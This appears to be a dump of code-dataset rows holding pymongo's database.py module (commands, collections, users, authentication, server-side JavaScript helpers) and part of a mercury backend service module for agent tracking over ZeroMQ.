repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
initNirvana/Easyphotos | env/lib/python3.4/site-packages/pymongo/database.py | 1 | 44607 | # Copyright 2009-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Database level operations."""
import warnings
from bson.binary import OLD_UUID_SUBTYPE
from bson.code import Code
from bson.dbref import DBRef
from bson.son import SON
from pymongo import auth, common, helpers
from pymongo.collection import Collection
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (CollectionInvalid,
ConfigurationError,
OperationFailure)
from pymongo.read_preferences import (modes,
secondary_ok_commands,
ReadPreference)
from pymongo.son_manipulator import SONManipulator
class Database(common.BaseObject):
"""A Mongo database.
"""
def __init__(self, connection, name):
"""Get a database by connection and name.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
database name.
:Parameters:
- `connection`: a client instance
- `name`: database name
.. mongodoc:: databases
"""
super(Database,
self).__init__(slave_okay=connection.slave_okay,
read_preference=connection.read_preference,
tag_sets=connection.tag_sets,
secondary_acceptable_latency_ms=(
connection.secondary_acceptable_latency_ms),
safe=connection.safe,
uuidrepresentation=connection.uuid_subtype,
**connection.write_concern)
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if name != '$external':
helpers._check_database_name(name)
self.__name = str(name)
self.__connection = connection
self.__incoming_manipulators = []
self.__incoming_copying_manipulators = []
self.__outgoing_manipulators = []
self.__outgoing_copying_manipulators = []
def add_son_manipulator(self, manipulator):
"""Add a new son manipulator to this database.
Newly added manipulators will be applied before existing ones.
:Parameters:
- `manipulator`: the manipulator to add
"""
base = SONManipulator()
def method_overwritten(instance, method):
return (getattr(
instance, method).__func__ != getattr(base, method).__func__)
if manipulator.will_copy():
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_copying_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_copying_manipulators.insert(0, manipulator)
else:
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_manipulators.insert(0, manipulator)
@property
def system_js(self):
"""A :class:`SystemJS` helper for this :class:`Database`.
See the documentation for :class:`SystemJS` for more details.
.. versionadded:: 1.5
"""
return SystemJS(self)
@property
def connection(self):
"""The client instance for this :class:`Database`.
.. versionchanged:: 1.3
``connection`` is now a property rather than a method.
"""
return self.__connection
@property
def name(self):
"""The name of this :class:`Database`.
.. versionchanged:: 1.3
``name`` is now a property rather than a method.
"""
return self.__name
@property
def incoming_manipulators(self):
"""List all incoming SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_manipulators]
@property
def incoming_copying_manipulators(self):
"""List all incoming SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_copying_manipulators]
@property
def outgoing_manipulators(self):
"""List all outgoing SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_manipulators]
@property
def outgoing_copying_manipulators(self):
"""List all outgoing SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_copying_manipulators]
def __eq__(self, other):
if isinstance(other, Database):
us = (self.__connection, self.__name)
them = (other.__connection, other.__name)
return us == them
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Database(%r, %r)" % (self.__connection, self.__name)
def __getattr__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return Collection(self, name)
def __getitem__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return self.__getattr__(name)
def create_collection(self, name, **kwargs):
"""Create a new :class:`~pymongo.collection.Collection` in this
database.
Normally collection creation is automatic. This method should
only be used to specify options on
creation. :class:`~pymongo.errors.CollectionInvalid` will be
raised if the collection already exists.
Options should be passed as keyword arguments to this method. Supported
options vary with MongoDB release. Some examples include:
- "size": desired initial size for the collection (in
bytes). For capped collections this size is the max
size of the collection.
- "capped": if True, this is a capped collection
- "max": maximum number of objects if capped (optional)
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `name`: the name of the collection to create
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionchanged:: 1.5
deprecating `options` in favor of kwargs
"""
opts = {"create": True}
opts.update(kwargs)
if name in self.collection_names():
raise CollectionInvalid("collection %s already exists" % name)
return Collection(self, name, **opts)
def _apply_incoming_manipulators(self, son, collection):
for manipulator in self.__incoming_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _apply_incoming_copying_manipulators(self, son, collection):
for manipulator in self.__incoming_copying_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _fix_incoming(self, son, collection):
"""Apply manipulators to an incoming SON object before it gets stored.
:Parameters:
- `son`: the son object going into the database
- `collection`: the collection the son object is being saved in
"""
son = self._apply_incoming_manipulators(son, collection)
son = self._apply_incoming_copying_manipulators(son, collection)
return son
def _fix_outgoing(self, son, collection):
"""Apply manipulators to a SON object as it comes out of the database.
:Parameters:
- `son`: the son object coming out of the database
- `collection`: the collection the son object was saved in
"""
for manipulator in reversed(self.__outgoing_manipulators):
son = manipulator.transform_outgoing(son, collection)
for manipulator in reversed(self.__outgoing_copying_manipulators):
son = manipulator.transform_outgoing(son, collection)
return son
def _command(self, command, value=1,
check=True, allowable_errors=None,
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Internal command helper.
"""
if isinstance(command, str):
command = SON([(command, value)])
command_name = list(command.keys())[0].lower()
must_use_master = kwargs.pop('_use_master', False)
if command_name not in secondary_ok_commands:
must_use_master = True
# Special-case: mapreduce can go to secondaries only if inline
if command_name == 'mapreduce':
out = command.get('out') or kwargs.get('out')
if not isinstance(out, dict) or not out.get('inline'):
must_use_master = True
# Special-case: aggregate with $out cannot go to secondaries.
if command_name == 'aggregate':
for stage in kwargs.get('pipeline', []):
if '$out' in stage:
must_use_master = True
break
extra_opts = {
'as_class': kwargs.pop('as_class', None),
'slave_okay': kwargs.pop('slave_okay', self.slave_okay),
'_must_use_master': must_use_master,
'_uuid_subtype': uuid_subtype
}
extra_opts['read_preference'] = kwargs.pop(
'read_preference',
self.read_preference)
extra_opts['tag_sets'] = kwargs.pop(
'tag_sets',
self.tag_sets)
extra_opts['secondary_acceptable_latency_ms'] = kwargs.pop(
'secondary_acceptable_latency_ms',
self.secondary_acceptable_latency_ms)
extra_opts['compile_re'] = compile_re
fields = kwargs.get('fields')
if fields is not None and not isinstance(fields, dict):
kwargs['fields'] = helpers._fields_list_to_dict(fields)
command.update(kwargs)
# Warn if must_use_master will override read_preference.
if (extra_opts['read_preference'] != ReadPreference.PRIMARY and
extra_opts['_must_use_master']):
warnings.warn("%s does not support %s read preference "
"and will be routed to the primary instead." %
(command_name,
modes[extra_opts['read_preference']]),
UserWarning, stacklevel=3)
cursor = self["$cmd"].find(command, **extra_opts).limit(-1)
for doc in cursor:
result = doc
if check:
msg = "command %s on namespace %s failed: %%s" % (
repr(command).replace("%", "%%"), self.name + '.$cmd')
helpers._check_command_response(result, self.connection.disconnect,
msg, allowable_errors)
return result, cursor.conn_id
def command(self, command, value=1,
check=True, allowable_errors=[],
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Issue a MongoDB command.
Send command `command` to the database and return the
response. If `command` is an instance of :class:`basestring`
(:class:`str` in python 3) then the command {`command`: `value`}
will be sent. Otherwise, `command` must be an instance of
:class:`dict` and will be sent as is.
Any additional keyword arguments will be added to the final
command document before it is sent.
For example, a command like ``{buildinfo: 1}`` can be sent
using:
>>> db.command("buildinfo")
For a command where the value matters, like ``{collstats:
collection_name}`` we can do:
>>> db.command("collstats", collection_name)
For commands that take additional arguments we can use
kwargs. So ``{filemd5: object_id, root: file_root}`` becomes:
>>> db.command("filemd5", object_id, root=file_root)
:Parameters:
- `command`: document representing the command to be issued,
or the name of the command (for simple commands only).
.. note:: the order of keys in the `command` document is
significant (the "verb" must come first), so commands
which require multiple keys (e.g. `findandmodify`)
should use an instance of :class:`~bson.son.SON` or
a string and kwargs instead of a Python `dict`.
- `value` (optional): value to use for the command verb when
`command` is passed as a string
- `check` (optional): check the response for errors, raising
:class:`~pymongo.errors.OperationFailure` if there are any
- `allowable_errors`: if `check` is ``True``, error messages
in this list will be ignored by error-checking
- `uuid_subtype` (optional): The BSON binary subtype to use
for a UUID used in this command.
- `compile_re` (optional): if ``False``, don't attempt to compile
BSON regular expressions into Python regular expressions. Return
instances of :class:`~bson.regex.Regex` instead. Can avoid
:exc:`~bson.errors.InvalidBSON` errors when receiving
Python-incompatible regular expressions, for example from
``currentOp``
- `read_preference`: The read preference for this connection.
See :class:`~pymongo.read_preferences.ReadPreference` for available
options.
- `tag_sets`: Read from replica-set members with these tags.
To specify a priority-order for tag sets, provide a list of
tag sets: ``[{'dc': 'ny'}, {'dc': 'la'}, {}]``. A final, empty tag
set, ``{}``, means "read from any member that matches the mode,
ignoring tags." ReplicaSetConnection tries each set of tags in turn
until it finds a set of tags with at least one matching member.
- `secondary_acceptable_latency_ms`: Any replica-set member whose
ping time is within secondary_acceptable_latency_ms of the nearest
member may accept reads. Default 15 milliseconds.
**Ignored by mongos** and must be configured on the command line.
See the localThreshold_ option for more information.
- `**kwargs` (optional): additional keyword arguments will
be added to the command document before it is sent
.. note:: ``command`` ignores the ``network_timeout`` parameter.
.. versionchanged:: 2.7
Added ``compile_re`` option.
.. versionchanged:: 2.3
Added `tag_sets` and `secondary_acceptable_latency_ms` options.
.. versionchanged:: 2.2
Added support for `as_class` - the class you want to use for
the resulting documents
.. versionchanged:: 1.6
Added the `value` argument for string commands, and keyword
arguments for additional command options.
.. versionchanged:: 1.5
`command` can be a string in addition to a full document.
.. versionadded:: 1.4
.. mongodoc:: commands
.. _localThreshold: http://docs.mongodb.org/manual/reference/mongos/#cmdoption-mongos--localThreshold
"""
return self._command(command, value, check, allowable_errors,
uuid_subtype, compile_re, **kwargs)[0]
def collection_names(self, include_system_collections=True):
"""Get a list of all the collection names in this database.
:Parameters:
- `include_system_collections` (optional): if ``False`` list
will not include system collections (e.g ``system.indexes``)
"""
client = self.connection
client._ensure_connected(True)
if client.max_wire_version > 2:
res, addr = self._command("listCollections",
cursor={},
read_preference=ReadPreference.PRIMARY)
# MongoDB 2.8rc2
if "collections" in res:
results = res["collections"]
# >= MongoDB 2.8rc3
else:
results = CommandCursor(self["$cmd"], res["cursor"], addr)
names = [result["name"] for result in results]
else:
names = [result["name"] for result
in self["system.namespaces"].find(_must_use_master=True)]
names = [n[len(self.__name) + 1:] for n in names
if n.startswith(self.__name + ".") and "$" not in n]
if not include_system_collections:
names = [n for n in names if not n.startswith("system.")]
return names
def drop_collection(self, name_or_collection):
"""Drop a collection.
:Parameters:
- `name_or_collection`: the name of a collection to drop or the
collection object itself
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
self.__connection._purge_index(self.__name, name)
self.command("drop", str(name), allowable_errors=["ns not found"],
read_preference=ReadPreference.PRIMARY)
def validate_collection(self, name_or_collection,
scandata=False, full=False):
"""Validate a collection.
Returns a dict of validation info. Raises CollectionInvalid if
validation fails.
With MongoDB < 1.9 the result dict will include a `result` key
with a string value that represents the validation results. With
MongoDB >= 1.9 the `result` key no longer exists and the results
are split into individual fields in the result dict.
:Parameters:
- `name_or_collection`: A Collection object or the name of a
collection to validate.
- `scandata`: Do extra checks beyond checking the overall
structure of the collection.
- `full`: Have the server do a more thorough scan of the
collection. Use with `scandata` for a thorough scan
of the structure of the collection and the individual
documents. Ignored in MongoDB versions before 1.9.
.. versionchanged:: 1.11
validate_collection previously returned a string.
.. versionadded:: 1.11
Added `scandata` and `full` options.
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
result = self.command("validate", str(name),
scandata=scandata, full=full,
read_preference=ReadPreference.PRIMARY)
valid = True
# Pre 1.9 results
if "result" in result:
info = result["result"]
if info.find("exception") != -1 or info.find("corrupt") != -1:
raise CollectionInvalid("%s invalid: %s" % (name, info))
# Sharded results
elif "raw" in result:
for _, res in result["raw"].items():
if "result" in res:
info = res["result"]
if (info.find("exception") != -1 or
info.find("corrupt") != -1):
raise CollectionInvalid("%s invalid: "
"%s" % (name, info))
elif not res.get("valid", False):
valid = False
break
# Post 1.9 non-sharded results.
elif not result.get("valid", False):
valid = False
if not valid:
raise CollectionInvalid("%s invalid: %r" % (name, result))
return result
def current_op(self, include_all=False):
"""Get information on operations currently running.
:Parameters:
- `include_all` (optional): if ``True`` also list currently
idle operations in the result
"""
if include_all:
return self['$cmd.sys.inprog'].find_one({"$all": True})
else:
return self['$cmd.sys.inprog'].find_one()
def profiling_level(self):
"""Get the database's current profiling level.
Returns one of (:data:`~pymongo.OFF`,
:data:`~pymongo.SLOW_ONLY`, :data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
result = self.command("profile", -1,
read_preference=ReadPreference.PRIMARY)
assert result["was"] >= 0 and result["was"] <= 2
return result["was"]
def set_profiling_level(self, level, slow_ms=None):
"""Set the database's profiling level.
:Parameters:
- `level`: Specifies a profiling level, see list of possible values
below.
- `slow_ms`: Optionally modify the threshold for the profile to
consider a query or operation. Even if the profiler is off queries
slower than the `slow_ms` level will get written to the logs.
Possible `level` values:
+----------------------------+------------------------------------+
| Level | Setting |
+============================+====================================+
| :data:`~pymongo.OFF` | Off. No profiling. |
+----------------------------+------------------------------------+
| :data:`~pymongo.SLOW_ONLY` | On. Only includes slow operations. |
+----------------------------+------------------------------------+
| :data:`~pymongo.ALL` | On. Includes all operations. |
+----------------------------+------------------------------------+
Raises :class:`ValueError` if level is not one of
(:data:`~pymongo.OFF`, :data:`~pymongo.SLOW_ONLY`,
:data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
if not isinstance(level, int) or level < 0 or level > 2:
raise ValueError("level must be one of (OFF, SLOW_ONLY, ALL)")
if slow_ms is not None and not isinstance(slow_ms, int):
raise TypeError("slow_ms must be an integer")
if slow_ms is not None:
self.command("profile", level, slowms=slow_ms,
read_preference=ReadPreference.PRIMARY)
else:
self.command("profile", level,
read_preference=ReadPreference.PRIMARY)
def profiling_info(self):
"""Returns a list containing current profiling information.
.. mongodoc:: profiling
"""
return list(self["system.profile"].find())
def error(self):
"""**DEPRECATED**: Get the error if one occurred on the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Return None if the last operation was error-free. Otherwise return the
error that occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("Database.error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
error_msg = error.get("err", "")
if error_msg is None:
return None
if error_msg.startswith("not master"):
self.__connection.disconnect()
return error
def last_status(self):
"""**DEPRECATED**: Get status information from the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Returns a SON object with status information.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("last_status() is deprecated",
DeprecationWarning, stacklevel=2)
return self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
def previous_error(self):
"""**DEPRECATED**: Get the most recent error on this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``getpreverror`` will be removed in a future MongoDB release.
Only returns errors that have occurred since the last call to
:meth:`reset_error_history`. Returns None if no such errors have
occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("previous_error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getpreverror",
read_preference=ReadPreference.PRIMARY)
if error.get("err", 0) is None:
return None
return error
def reset_error_history(self):
"""**DEPRECATED**: Reset the error history of this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``reseterror`` will be removed in a future MongoDB release.
Calls to :meth:`previous_error` will only return errors that have
occurred since the most recent call to this method.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("reset_error_history() is deprecated",
DeprecationWarning, stacklevel=2)
self.command("reseterror",
read_preference=ReadPreference.PRIMARY)
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Database' object is not iterable")
def _default_role(self, read_only):
if self.name == "admin":
if read_only:
return "readAnyDatabase"
else:
return "root"
else:
if read_only:
return "read"
else:
return "dbOwner"
def _create_or_update_user(
self, create, name, password, read_only, **kwargs):
"""Use a command to create (if create=True) or modify a user.
"""
opts = {}
if read_only or (create and "roles" not in kwargs):
warnings.warn("Creating a user with the read_only option "
"or without roles is deprecated in MongoDB "
">= 2.6", DeprecationWarning)
opts["roles"] = [self._default_role(read_only)]
elif read_only:
warnings.warn("The read_only option is deprecated in MongoDB "
">= 2.6, use 'roles' instead", DeprecationWarning)
if password is not None:
# We always salt and hash client side.
if "digestPassword" in kwargs:
raise ConfigurationError("The digestPassword option is not "
"supported via add_user. Please use "
"db.command('createUser', ...) "
"instead for this option.")
opts["pwd"] = auth._password_digest(name, password)
opts["digestPassword"] = False
opts["writeConcern"] = self._get_wc_override() or self.write_concern
opts.update(kwargs)
if create:
command_name = "createUser"
else:
command_name = "updateUser"
self.command(command_name, name,
read_preference=ReadPreference.PRIMARY, **opts)
def _legacy_add_user(self, name, password, read_only, **kwargs):
"""Uses v1 system to add users, i.e. saving to system.users.
"""
user = self.system.users.find_one({"user": name}) or {"user": name}
if password is not None:
user["pwd"] = auth._password_digest(name, password)
if read_only is not None:
user["readOnly"] = read_only
user.update(kwargs)
try:
self.system.users.save(user, **self._get_wc_override())
except OperationFailure as exc:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
if 'login' in str(exc):
pass
# First admin user add fails gle from mongos 2.0.x
# and 2.2.x.
elif (exc.details and
'getlasterror' in exc.details.get('note', '')):
pass
else:
raise
def add_user(self, name, password=None, read_only=None, **kwargs):
"""Create user `name` with password `password`.
Add a new user with permissions for this :class:`Database`.
.. note:: Will change the password if user `name` already exists.
:Parameters:
- `name`: the name of the user to create
- `password` (optional): the password of the user to create. Can not
be used with the ``userSource`` argument.
- `read_only` (optional): if ``True`` the user will be read only
- `**kwargs` (optional): optional fields for the user document
(e.g. ``userSource``, ``otherDBRoles``, or ``roles``). See
`<http://docs.mongodb.org/manual/reference/privilege-documents>`_
for more information.
.. note:: The use of optional keyword arguments like ``userSource``,
``otherDBRoles``, or ``roles`` requires MongoDB >= 2.4.0
.. versionchanged:: 2.5
Added kwargs support for optional fields introduced in MongoDB 2.4
.. versionchanged:: 2.2
Added support for read only users
.. versionadded:: 1.4
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None:
if not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s or None" % (str.__name__,))
if len(password) == 0:
raise ValueError("password can't be empty")
if read_only is not None:
read_only = common.validate_boolean('read_only', read_only)
if 'roles' in kwargs:
raise ConfigurationError("Can not use "
"read_only and roles together")
try:
uinfo = self.command("usersInfo", name,
read_preference=ReadPreference.PRIMARY)
self._create_or_update_user(
(not uinfo["users"]), name, password, read_only, **kwargs)
except OperationFailure as exc:
# MongoDB >= 2.5.3 requires the use of commands to manage
# users.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self._legacy_add_user(name, password, read_only, **kwargs)
# Unauthorized. MongoDB >= 2.7.1 has a narrow localhost exception,
# and we must add a user before sending commands.
elif exc.code == 13:
self._create_or_update_user(
True, name, password, read_only, **kwargs)
else:
raise
def remove_user(self, name):
"""Remove user `name` from this :class:`Database`.
User `name` will no longer have permissions to access this
:class:`Database`.
:Parameters:
- `name`: the name of the user to remove
.. versionadded:: 1.4
"""
try:
write_concern = self._get_wc_override() or self.write_concern
self.command("dropUser", name,
read_preference=ReadPreference.PRIMARY,
writeConcern=write_concern)
except OperationFailure as exc:
# See comment in add_user try / except above.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self.system.users.remove({"user": name},
**self._get_wc_override())
return
raise
def authenticate(self, name, password=None,
source=None, mechanism='DEFAULT', **kwargs):
"""Authenticate to use this database.
Authentication lasts for the life of the underlying client
instance, or until :meth:`logout` is called.
Raises :class:`TypeError` if (required) `name`, (optional) `password`,
or (optional) `source` is not an instance of :class:`basestring`
(:class:`str` in python 3).
.. note::
- This method authenticates the current connection, and
will also cause all new :class:`~socket.socket` connections
in the underlying client instance to be authenticated automatically.
- Authenticating more than once on the same database with different
credentials is not supported. You must call :meth:`logout` before
authenticating with new credentials.
- When sharing a client instance between multiple threads, all
threads will share the authentication. If you need different
authentication profiles for different purposes you must use
distinct client instances.
- To get authentication to apply immediately to all
existing sockets you may need to reset this client instance's
sockets using :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
:Parameters:
- `name`: the name of the user to authenticate.
- `password` (optional): the password of the user to authenticate.
Not used with GSSAPI or MONGODB-X509 authentication.
- `source` (optional): the database to authenticate on. If not
specified the current database is used.
- `mechanism` (optional): See
:data:`~pymongo.auth.MECHANISMS` for options.
By default, use SCRAM-SHA-1 with MongoDB 3.0 and later,
MONGODB-CR (MongoDB Challenge Response protocol) for older servers.
- `gssapiServiceName` (optional): Used with the GSSAPI mechanism
to specify the service name portion of the service principal name.
Defaults to 'mongodb'.
.. versionadded:: 2.8
Use SCRAM-SHA-1 with MongoDB 3.0 and later.
.. versionchanged:: 2.5
Added the `source` and `mechanism` parameters. :meth:`authenticate`
now raises a subclass of :class:`~pymongo.errors.PyMongoError` if
authentication fails due to invalid credentials or configuration
issues.
.. mongodoc:: authenticate
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None and not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s" % (str.__name__,))
if source is not None and not isinstance(source, str):
raise TypeError("source must be an instance "
"of %s" % (str.__name__,))
common.validate_auth_mechanism('mechanism', mechanism)
validated_options = {}
for option, value in kwargs.items():
normalized, val = common.validate_auth_option(option, value)
validated_options[normalized] = val
credentials = auth._build_credentials_tuple(mechanism,
source or self.name, name,
password, validated_options)
self.connection._cache_credentials(self.name, credentials)
return True
def logout(self):
"""Deauthorize use of this database for this client instance.
.. note:: Other databases may still be authenticated, and other
existing :class:`~socket.socket` connections may remain
authenticated for this database unless you reset all sockets
with :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
"""
# Sockets will be deauthenticated as they are used.
self.connection._purge_credentials(self.name)
def dereference(self, dbref, **kwargs):
"""Dereference a :class:`~bson.dbref.DBRef`, getting the
document it points to.
Raises :class:`TypeError` if `dbref` is not an instance of
:class:`~bson.dbref.DBRef`. Returns a document, or ``None`` if
the reference does not point to a valid document. Raises
:class:`ValueError` if `dbref` has a database specified that
is different from the current database.
:Parameters:
- `dbref`: the reference
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to
:meth:`~pymongo.collection.Collection.find`.
"""
if not isinstance(dbref, DBRef):
raise TypeError("cannot dereference a %s" % type(dbref))
if dbref.database is not None and dbref.database != self.__name:
raise ValueError("trying to dereference a DBRef that points to "
"another database (%r not %r)" % (dbref.database,
self.__name))
return self[dbref.collection].find_one({"_id": dbref.id}, **kwargs)
def eval(self, code, *args):
"""Evaluate a JavaScript expression in MongoDB.
Useful if you need to touch a lot of data lightly; in such a
scenario the network transfer of the data could be a
bottleneck. The `code` argument must be a JavaScript
function. Additional positional arguments will be passed to
that function when it is run on the server.
Raises :class:`TypeError` if `code` is not an instance of
:class:`basestring` (:class:`str` in python 3) or `Code`.
Raises :class:`~pymongo.errors.OperationFailure` if the eval
fails. Returns the result of the evaluation.
:Parameters:
- `code`: string representation of JavaScript code to be
evaluated
- `args` (optional): additional positional arguments are
passed to the `code` being evaluated
"""
if not isinstance(code, Code):
code = Code(code)
result = self.command("$eval", code,
read_preference=ReadPreference.PRIMARY,
args=args)
return result.get("retval", None)
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
raise TypeError("'Database' object is not callable. If you meant to "
"call the '%s' method on a '%s' object it is "
"failing because no such method exists." % (
self.__name, self.__connection.__class__.__name__))
class SystemJS(object):
"""Helper class for dealing with stored JavaScript.
"""
def __init__(self, database):
"""Get a system js helper for the database `database`.
An instance of :class:`SystemJS` can be created with an instance
of :class:`Database` through :attr:`Database.system_js`,
manual instantiation of this class should not be necessary.
:class:`SystemJS` instances allow for easy manipulation and
access to server-side JavaScript:
.. doctest::
>>> db.system_js.add1 = "function (x) { return x + 1; }"
>>> db.system.js.find({"_id": "add1"}).count()
1
>>> db.system_js.add1(5)
6.0
>>> del db.system_js.add1
>>> db.system.js.find({"_id": "add1"}).count()
0
.. note:: Requires server version **>= 1.1.1**
.. versionadded:: 1.5
"""
# can't just assign it since we've overridden __setattr__
object.__setattr__(self, "_db", database)
def __setattr__(self, name, code):
self._db.system.js.save({"_id": name, "value": Code(code)},
**self._db._get_wc_override())
def __setitem__(self, name, code):
self.__setattr__(name, code)
def __delattr__(self, name):
self._db.system.js.remove({"_id": name}, **self._db._get_wc_override())
def __delitem__(self, name):
self.__delattr__(name)
def __getattr__(self, name):
return lambda *args: self._db.eval(Code("function() { "
"return this[name].apply("
"this, arguments); }",
scope={'name': name}), *args)
def __getitem__(self, name):
return self.__getattr__(name)
def list(self):
"""Get a list of the names of the functions stored in this database.
.. versionadded:: 1.9
"""
return [x["_id"] for x in self._db.system.js.find(fields=["_id"])]
| mit | -8,870,270,720,626,688,000 | 39.114209 | 109 | 0.571749 | false |
jr0d/mercury | src/mercury/backend/service.py | 1 | 7176 | # Copyright 2015 Jared Rodriguez ([email protected])
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
import zmq
import zmq.asyncio
from mercury.common.asyncio.dispatcher import AsyncDispatcher
from mercury.common.asyncio.transport import TrivialAsyncRouterReqService
from mercury.common.asyncio.clients.inventory import \
InventoryClient as AsyncInventoryClient
from mercury.common.clients.inventory import InventoryClient
from mercury.backend.active_asyncio import add_active_record, ping_loop, \
stop_ping
from mercury.backend.controller import BackendController
from mercury.backend.options import parse_options
from mercury.backend.rpc_client import AsyncRPCClient
log = logging.getLogger(__name__)
class BackEndService(TrivialAsyncRouterReqService):
def __init__(self,
bind_address,
inventory_client,
rpc_client,
name,
datacenter,
vip,
port):
super(BackEndService, self).__init__(bind_address)
self.inventory_client = inventory_client
self.rpc_client = rpc_client
self.server_info = {
'name': name,
'datacenter': datacenter,
'address': vip,
'port': port
}
self.controller = BackendController(self.server_info,
self.inventory_client,
self.rpc_client)
self.dispatcher = AsyncDispatcher(self.controller)
async def process(self, message):
""" Process the message via dispatcher """
return await self.dispatcher.dispatch(message)
def reacquire(inventory_url, backend_name):
"""
:param inventory_url:
:param backend_name:
:return:
"""
# Onetime use synchronous client
log.info('Attempting to reacquire active agents')
log.debug('Inventory Router: {}'.format(inventory_url))
inventory_client = InventoryClient(inventory_url,
# TODO: Add these to configuration
response_timeout=60,
rcv_retry=10)
existing_documents = inventory_client.query({'active': {'$ne': None},
'origin.name': backend_name},
projection={'mercury_id': 1,
'active': 1})
if existing_documents.get('error'): # Transport Error
log.error('[BACKEND CRITICAL] '
'Error communicating with inventory service, could not '
'reacquire: <{}>'.format(existing_documents.get('message')))
# Return without reacquiring any nodes. Once communication is
# reestablished, agents will begin to re-register
return
for doc in existing_documents['message']['items']:
if not BackendController.validate_agent_info(doc['active']):
log.error('Found junk in document {} expunging'.format(
doc['mercury_id']))
inventory_client.update_one(doc['mercury_id'], {'active': None})
